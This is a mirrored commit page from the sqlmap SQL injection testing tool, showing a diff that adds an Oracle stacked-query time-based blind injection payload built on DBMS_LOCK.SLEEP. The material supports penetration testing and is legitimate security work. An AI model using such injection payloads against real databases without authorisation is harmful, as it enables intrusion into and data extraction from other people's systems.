mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-09 08:00:36 +03:00
Oracle stacked vector based on DBMS_LOCK.SLEEP (https://foro.undersecurity.net/read.php?46,1436)
This commit is contained in:
parent
0fc4ebdc1b
commit
f31c028232
|
@ -1454,6 +1454,26 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
|
||||||
|
<stype>4</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>0</risk>
|
||||||
|
<clause>0</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
|
||||||
|
<request>
|
||||||
|
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[SLEEPTIME]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Oracle</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>SQLite > 2.0 stacked queries (heavy query)</title>
|
<title>SQLite > 2.0 stacked queries (heavy query)</title>
|
||||||
<stype>4</stype>
|
<stype>4</stype>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user